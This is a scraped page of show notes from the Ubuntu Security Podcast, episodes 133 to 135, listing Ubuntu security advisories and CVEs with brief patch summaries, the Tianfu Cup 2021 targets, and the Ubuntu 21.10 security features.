                                                                                                                                                                                                                                                                                                                                                        • iptables userspace added a nft backend so existing iptables rules and
                                                                                                                                                                                                                                                                                                                                                        • users would be switched to that automatically - was already switched to
                                                                                                                                                                                                                                                                                                                                                          use nft backend in Ubuntu 21.04
                                                                                                                                                                                                                                                                                                                                                        • now want to support the nftables userspace package for handling
                                                                                                                                                                                                                                                                                                                                                        • nftables as a first class system
                                                                                                                                                                                                                                                                                                                                                        • also look at implementing a nftables backend in ufw so it can drive
                                                                                                                                                                                                                                                                                                                                                        • nftables directly rather than iptables
                                                                                                                                                                                                                                                                                                                                                        • Improvements to OVAL data
                                                                                                                                                                                                                                                                                                                                                          • Improved information around ESM products etc
                                                                                                                                                                                                                                                                                                                                                          • Improved handling of pivot_root in AppArmor
                                                                                                                                                                                                                                                                                                                                                            • Upstream issue https://gitlab.com/apparmor/apparmor/-/issues/113
                                                                                                                                                                                                                                                                                                                                                            • once a pivot_root occurs, AppArmor loses track of the original paths so
                                                                                                                                                                                                                                                                                                                                                            • if a root level process is granted pivot_root permission, can move
                                                                                                                                                                                                                                                                                                                                                              around inside it’s own mount namespace to be able to escape outside the
                                                                                                                                                                                                                                                                                                                                                              AppArmor policy
                                                                                                                                                                                                                                                                                                                                                            • AppArmor needs to track root before and after and allow to specify
                                                                                                                                                                                                                                                                                                                                                            • policy both pre-and-post
                                                                                                                                                                                                                                                                                                                                                              Hiring [14:46]
                                                                                                                                                                                                                                                                                                                                                              Security - Product Manager
                                                                                                                                                                                                                                                                                                                                                              • HOME BASED - EMEA (Europe, Middle East, Africa)
                                                                                                                                                                                                                                                                                                                                                              • Role includes:
                                                                                                                                                                                                                                                                                                                                                                • guiding the evolution of security offerings from Canonical and Ubuntu
                                                                                                                                                                                                                                                                                                                                                                • driving compliance and certification of Ubuntu
                                                                                                                                                                                                                                                                                                                                                                • engaging with the open source security community
                                                                                                                                                                                                                                                                                                                                                                • telling the story of Canonical’s work to deliver secure platforms
                                                                                                                                                                                                                                                                                                                                                                • https://canonical.com/careers/2278145/security-product-manager-remote
                                                                                                                                                                                                                                                                                                                                                                • Get in contact
                                                                                                                                                                                                                                                                                                                                                                  • #ubuntu-security on the Libera.Chat IRC network
                                                                                                                                                                                                                                                                                                                                                                  • ubuntu-hardened mailing list
                                                                                                                                                                                                                                                                                                                                                                  • Security section on discourse.ubuntu.com
                                                                                                                                                                                                                                                                                                                                                                  • @ubuntu_sec on twitter
                                                                                                                                                                                                                                                                                                                                                                  • 17 min
                                                                                                                                                                                                                                                                                                                                                                  • Episode 135
                                                                                                                                                                                                                                                                                                                                                                    Overview

                                                                                                                                                                                                                                                                                                                                                                    Ubuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security

                                                                                                                                                                                                                                                                                                                                                                    updates for Linux kernel, nginx, Ardour and strongSwan.

                                                                                                                                                                                                                                                                                                                                                                    This week in Ubuntu Security Updates

                                                                                                                                                                                                                                                                                                                                                                    24 unique CVEs addressed

                                                                                                                                                                                                                                                                                                                                                                    [USN-5091-3] Linux kernel (Azure) regression
                                                                                                                                                                                                                                                                                                                                                                    • 6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                      • CVE-2021-38204
                                                                                                                                                                                                                                                                                                                                                                      • CVE-2021-38199
                                                                                                                                                                                                                                                                                                                                                                      • CVE-2021-38160
                                                                                                                                                                                                                                                                                                                                                                      • CVE-2021-37576
                                                                                                                                                                                                                                                                                                                                                                      • CVE-2021-3679
                                                                                                                                                                                                                                                                                                                                                                      • CVE-2021-33624
                                                                                                                                                                                                                                                                                                                                                                      • [USN-5092-3] Linux kernel (Azure) regression [00:50]
                                                                                                                                                                                                                                                                                                                                                                        • 12 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-38205
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-38204
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-38201
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-38199
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-38160
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-37576
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-37159
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-3679
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-35477
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-34556
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-33624
                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-41073
                                                                                                                                                                                                                                                                                                                                                                          • Failure to boot on large Azure instance types - caused by a patch that
                                                                                                                                                                                                                                                                                                                                                                          • got backported to the 5.14 upstream stable kernel that was purported to
                                                                                                                                                                                                                                                                                                                                                                            head off possible future problems, but itself caused issues on say the
                                                                                                                                                                                                                                                                                                                                                                            Standard_D48_v3 instance (48 vCPUs, 192GB RAM, 1.2TB storage) - dropped
                                                                                                                                                                                                                                                                                                                                                                            that patch to resolve the issue
                                                                                                                                                                                                                                                                                                                                                                            [USN-5109-1] nginx vulnerability [01:44]
                                                                                                                                                                                                                                                                                                                                                                            • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
                                                                                                                                                                                                                                                                                                                                                                              • CVE-2017-20005
                                                                                                                                                                                                                                                                                                                                                                              • Buffer overflow when handling files with modification dates a long time
                                                                                                                                                                                                                                                                                                                                                                              • in the past - ie. 1969 or very far in the future - integer overflow in
                                                                                                                                                                                                                                                                                                                                                                                the autoindex module
                                                                                                                                                                                                                                                                                                                                                                                [USN-5110-1] Ardour vulnerability [02:22]
                                                                                                                                                                                                                                                                                                                                                                                • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                  • CVE-2020-22617
                                                                                                                                                                                                                                                                                                                                                                                  • UAF in handling of crafted XML files - if using attacker provided files
                                                                                                                                                                                                                                                                                                                                                                                  • could DoS / RCE
                                                                                                                                                                                                                                                                                                                                                                                    [USN-5111-1, USN-5111-2] strongSwan vulnerabilities [02:39]
                                                                                                                                                                                                                                                                                                                                                                                    • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                                                                                                                                                                                    • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
                                                                                                                                                                                                                                                                                                                                                                                      • CVE-2021-41991
                                                                                                                                                                                                                                                                                                                                                                                      • CVE-2021-41990
                                                                                                                                                                                                                                                                                                                                                                                      • Integer overflow when replacing certs in cache - if can send many
                                                                                                                                                                                                                                                                                                                                                                                      • requests with different certs can fill cache and then cause replacement
                                                                                                                                                                                                                                                                                                                                                                                        of cache entries when gets full - LRU algorithm could then cause integer
                                                                                                                                                                                                                                                                                                                                                                                        overflow and hence OOB write as a result
                                                                                                                                                                                                                                                                                                                                                                                      • Integer overflow in gmp plugin - crafted RSASSA-PSS signature in say a
                                                                                                                                                                                                                                                                                                                                                                                      • self-signed CA cert sent by an initiation
                                                                                                                                                                                                                                                                                                                                                                                        [USN-5113-1] Linux kernel vulnerabilities [04:13]
                                                                                                                                                                                                                                                                                                                                                                                        • 8 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-42008
                                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-40490
                                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-38166
                                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-3753
                                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-3743
                                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-3739
                                                                                                                                                                                                                                                                                                                                                                                          • CVE-2021-3732
                                                                                                                                                                                                                                                                                                                                                                                          • CVE-2020-3702
                                                                                                                                                                                                                                                                                                                                                                                          • 5.11 hirsute kernel (20.04 HWE)
                                                                                                                                                                                                                                                                                                                                                                                          • overlayfs perms handling issue, race condition -> OOB read in VT
                                                                                                                                                                                                                                                                                                                                                                                          • subsystem, integer overflow in hashtable implementation in BPF, ext4
                                                                                                                                                                                                                                                                                                                                                                                            xattrs race -> UAF, ath9k race condition -> info leak
                                                                                                                                                                                                                                                                                                                                                                                            Goings on in Ubuntu Security Community
                                                                                                                                                                                                                                                                                                                                                                                            Tianfu Cup 2021 [05:30]
                                                                                                                                                                                                                                                                                                                                                                                            • https://www.tianfucup.com/en
                                                                                                                                                                                                                                                                                                                                                                                            • 16-17th October - China’s own Pwn2Own
                                                                                                                                                                                                                                                                                                                                                                                            • Teams required to use original vulns to hack target platforms - 1.5m USD
                                                                                                                                                                                                                                                                                                                                                                                            • total reward
                                                                                                                                                                                                                                                                                                                                                                                            • Targets
                                                                                                                                                                                                                                                                                                                                                                                              • Docker-CE on Ubuntu 20.04 w generic kernel running a Ubuntu 20.04
                                                                                                                                                                                                                                                                                                                                                                                              • desktop container with ssh access as root to the container running
                                                                                                                                                                                                                                                                                                                                                                                                unprivileged w/o uidmap, volume mount and default bridge network - 60k
                                                                                                                                                                                                                                                                                                                                                                                                USD price
                                                                                                                                                                                                                                                                                                                                                                                              • Ubuntu 20.04 / Centos 8 running in VMWare Workstation - unprivileged
                                                                                                                                                                                                                                                                                                                                                                                              • user to escalate to root - 40k USD
                                                                                                                                                                                                                                                                                                                                                                                              • Ubuntu + qemu-kvm - 20.04 desktop host, running 20.04 server in qemu -
                                                                                                                                                                                                                                                                                                                                                                                              • VM escape w/o sandbox escape - 60k USD, w/ sandbox escape 150k USD
                                                                                                                                                                                                                                                                                                                                                                                              • 3 5 minute attempts to run their exploits
                                                                                                                                                                                                                                                                                                                                                                                              • According to media reports - Ubuntu 20.04 root privesc - 4 times,
                                                                                                                                                                                                                                                                                                                                                                                              • Docker-CE and qemu VM - once
                                                                                                                                                                                                                                                                                                                                                                                              • Also iPhone 13 Pro was hacked using a no-interaction RCE attack, plus
                                                                                                                                                                                                                                                                                                                                                                                              • Google Chrome to get kernel privesc on Windows as well
                                                                                                                                                                                                                                                                                                                                                                                              • Also according to one media outlet “details unknown but vendors are
                                                                                                                                                                                                                                                                                                                                                                                              • expected to release patches in coming weeks” - so far no contact /
                                                                                                                                                                                                                                                                                                                                                                                                details have been provided to us…
                                                                                                                                                                                                                                                                                                                                                                                              • Same has happened in previous years - no details get provided to vendors
                                                                                                                                                                                                                                                                                                                                                                                              • so issues don’t get patched - in the past, exploits which have been
                                                                                                                                                                                                                                                                                                                                                                                                showcased at Tianfu have then allegedly gone on to be used in hacking
                                                                                                                                                                                                                                                                                                                                                                                                campaigns by the Chinese government
                                                                                                                                                                                                                                                                                                                                                                                              • Contrast with Pwn2Own - we are invited by organisers to watch and verify
                                                                                                                                                                                                                                                                                                                                                                                              • attempts in real-time to help judge whether exploits used are actually
                                                                                                                                                                                                                                                                                                                                                                                                unique and new, and then ZDI provide details immediately regarding the
                                                                                                                                                                                                                                                                                                                                                                                                vulns along with PoCs so we can patch them ASAP
                                                                                                                                                                                                                                                                                                                                                                                                Get in contact
                                                                                                                                                                                                                                                                                                                                                                                                • #ubuntu-security on the Libera.Chat IRC network
                                                                                                                                                                                                                                                                                                                                                                                                • ubuntu-hardened mailing list
                                                                                                                                                                                                                                                                                                                                                                                                • Security section on discourse.ubuntu.com
                                                                                                                                                                                                                                                                                                                                                                                                • @ubuntu_sec on twitter
                                                                                                                                                                                                                                                                                                                                                                                                • 12 min
                                                                                                                                                                                                                                                                                                                                                                                                • Episode 134
                                                                                                                                                                                                                                                                                                                                                                                                  Overview

                                                                                                                                                                                                                                                                                                                                                                                                  It’s release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more.

                                                                                                                                                                                                                                                                                                                                                                                                  This week in Ubuntu Security Updates

                                                                                                                                                                                                                                                                                                                                                                                                  58 unique CVEs addressed

                                                                                                                                                                                                                                                                                                                                                                                                  [USN-5095-1] Apache Commons IO vulnerability [00:46]
                                                                                                                                                                                                                                                                                                                                                                                                  • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-29425
                                                                                                                                                                                                                                                                                                                                                                                                    • Failed to properly sanitize filenames in FileNameUtils.normalize() -
                                                                                                                                                                                                                                                                                                                                                                                                    • should remove relative path components like ../ but if contained leading
                                                                                                                                                                                                                                                                                                                                                                                                      double-slashes this would fail - and the original path would be returned
                                                                                                                                                                                                                                                                                                                                                                                                      without alteration - so could then possibly get relative directory
                                                                                                                                                                                                                                                                                                                                                                                                      traversal to the parent directory depending on how this returned value
                                                                                                                                                                                                                                                                                                                                                                                                      was used.
                                                                                                                                                                                                                                                                                                                                                                                                      [USN-5096-1] Linux kernel (OEM) vulnerabilities
                                                                                                                                                                                                                                                                                                                                                                                                      • 16 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-40490
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-38205
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-38204
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-38203
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-38202
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-38201
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-38199
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-38166
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-38160
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-3732
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-37159
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-3679
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-3612
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-35477
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-34556
                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-41073
                                                                                                                                                                                                                                                                                                                                                                                                        • [USN-5091-2] Linux kernel (Raspberry Pi) vulnerabilities
                                                                                                                                                                                                                                                                                                                                                                                                          • 5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-38204
                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-38199
                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-38160
                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-3679
                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-33624
                                                                                                                                                                                                                                                                                                                                                                                                            • [USN-5094-2] Linux kernel (Raspberry Pi) vulnerabilities
                                                                                                                                                                                                                                                                                                                                                                                                              • 5 CVEs addressed in Bionic (18.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-38205
                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-38204
                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-3732
                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-3679
                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-22543
                                                                                                                                                                                                                                                                                                                                                                                                                • [USN-5106-1] Linux kernel (OEM) vulnerabilities [01:36]
                                                                                                                                                                                                                                                                                                                                                                                                                  • 6 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-38199
                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-38160
                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-3612
                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-22543
                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2020-26541
                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-41073
                                                                                                                                                                                                                                                                                                                                                                                                                    • io_uring (5.1) - unprivileged user - trigger free of other kernel
                                                                                                                                                                                                                                                                                                                                                                                                                    • memory - code execution
                                                                                                                                                                                                                                                                                                                                                                                                                    • Episode 133
                                                                                                                                                                                                                                                                                                                                                                                                                    • [USN-4973-2] Python vulnerability [02:18]
                                                                                                                                                                                                                                                                                                                                                                                                                      • 1 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-29921
                                                                                                                                                                                                                                                                                                                                                                                                                        • ipaddress with octal encoded numbers vuln previously fixed but the patch
                                                                                                                                                                                                                                                                                                                                                                                                                        • with this fix got dropped in an intervening SRU where 3.8.10 got
                                                                                                                                                                                                                                                                                                                                                                                                                          backported to 20.04 (LP: #1928057)
                                                                                                                                                                                                                                                                                                                                                                                                                          [USN-5099-1] Imlib2 vulnerability [03:11]
                                                                                                                                                                                                                                                                                                                                                                                                                          • 1 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2020-12761
                                                                                                                                                                                                                                                                                                                                                                                                                            • integer overflow -> OOB read - ICO file with an excessive amount of
                                                                                                                                                                                                                                                                                                                                                                                                                            • colors declared in its color map - fixed to error out in this case
                                                                                                                                                                                                                                                                                                                                                                                                                              [USN-5100-1] containerd vulnerability [03:43]
                                                                                                                                                                                                                                                                                                                                                                                                                              • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-41103
                                                                                                                                                                                                                                                                                                                                                                                                                                • container bundles root dirs and plugins had excessive permissions -
                                                                                                                                                                                                                                                                                                                                                                                                                                • allows an unprivileged Linux user to traverse directory contents and
                                                                                                                                                                                                                                                                                                                                                                                                                                  execute programs in these dirs. If a container image was created with
                                                                                                                                                                                                                                                                                                                                                                                                                                  setuid executables then that user on the Linux host could execute these
                                                                                                                                                                                                                                                                                                                                                                                                                                  setuid binaries and gain root privileges on the host.
                                                                                                                                                                                                                                                                                                                                                                                                                                  [USN-5101-1] MongoDB vulnerability [04:34]
                                                                                                                                                                                                                                                                                                                                                                                                                                  • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2019-20925
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Unauthenticated client can send crafted messages to the server which
                                                                                                                                                                                                                                                                                                                                                                                                                                    • specify a negative size when decompressed - an insufficient amount of
                                                                                                                                                                                                                                                                                                                                                                                                                                      memory would then get allocated and lead to a possible OOB write
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Thanks to Heather Lemon from Sustaining Engineering team for preparing
                                                                                                                                                                                                                                                                                                                                                                                                                                    • this update
                                                                                                                                                                                                                                                                                                                                                                                                                                      [USN-5102-1] Mercurial vulnerabilities [05:10]
                                                                                                                                                                                                                                                                                                                                                                                                                                      • 2 CVEs addressed in Bionic (18.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2018-17983
                                                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2019-3902
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Mishandled symlinks in subrepos - defeats usual path-checking logic and
                                                                                                                                                                                                                                                                                                                                                                                                                                        • so could could allow an attacker to write arbitrary files to the victim’s
                                                                                                                                                                                                                                                                                                                                                                                                                                          filesystem outside the repo
                                                                                                                                                                                                                                                                                                                                                                                                                                        • OOB read when parsing malformed manifest entries
                                                                                                                                                                                                                                                                                                                                                                                                                                        • [USN-5097-1] LedgerSMB vulnerabilities
                                                                                                                                                                                                                                                                                                                                                                                                                                          • 3 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-3731
                                                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-3694
                                                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-3693
                                                                                                                                                                                                                                                                                                                                                                                                                                            • [USN-5098-1] bl vulnerability
                                                                                                                                                                                                                                                                                                                                                                                                                                              • 1 CVEs addressed in Bionic (18.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2020-8244
                                                                                                                                                                                                                                                                                                                                                                                                                                                • [USN-5103-1] docker.io vulnerability
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • 1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-41089
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • docker cp - could craft a container image that would result in docker cp
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • making changes to existing files on the host filesystem - doesn’t
                                                                                                                                                                                                                                                                                                                                                                                                                                                      actually allow to read/modify or execute files on the host but could make
                                                                                                                                                                                                                                                                                                                                                                                                                                                      them readable/change perms etc and expose info on the host
                                                                                                                                                                                                                                                                                                                                                                                                                                                      [USN-5104-1] Squid vulnerability
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2021-28116
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • [USN-5105-1] Bottle vulnerability
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2020-28473
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • [USN-5022-3] MySQL vulnerabilities
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 16 CVEs addressed in Xenial ESM (16.04 ESM)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2390
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2385
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2342
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2307
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2226
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2194
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2171
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2169
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2166
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2162
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • CVE-2021-2146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • [USN-5107-1] Firefox vulnerabilities [06:47]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • 7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-38501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-38500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-38499
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-38498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-38497
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-38496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • CVE-2021-32810
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • 93.0 - usual web issues - “if a user were tricked into opening a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • specially crafted website, an attacker could potentially exploit these to
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cause a denial of service, spoof another origin, or execute arbitrary
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      code.”
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      [USN-5108-1] libntlm vulnerability [07:32]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • CVE-2019-17455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • stack buffer OOB read when handling a crafted NTLM request since used a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • fixed size buffer in various functions - fixed to truncate size to fit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          within the buffer if too big to avoid overflowing the buffer
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          [USN-5078-3] Squashfs-Tools vulnerability [07:54]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • CVE-2021-41072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Original backport of patch contained an error and so failed to work for
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • squashfs 2.x filesystems - would fail to actually sort entries as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expected - thanks to Salvatore Bonaccorso from the Debian security team
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              for bringing this to our attention
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Goings on in Ubuntu Security Community
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Ubuntu 21.10 (Impish Indri) released [09:08]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • https://ubuntu.com/blog/ubuntu-21-10-has-landed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 5.13 kernel
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • KFENCE memory error detector
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Stack offset randomisation across system-calls
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Landlock LSM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disabled unprivileged BPF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • GCC 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Hiring [13:12]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Security Product Manager
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • https://canonical.com/careers/2278145/security-product-manager-remote
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Get in contact
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • #ubuntu-security on the Libera.Chat IRC network
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • ubuntu-hardened mailing list
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Security section on discourse.ubuntu.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @ubuntu_sec on twitter
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • 15 min

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    About Ubuntu Security Podcast

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    From the publisher's feed

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    A fortnightly podcast talking about the latest developments and updates from the Ubuntu Security team, including a summary of recent security vulnerabilities and fixes as well as a discussion on some…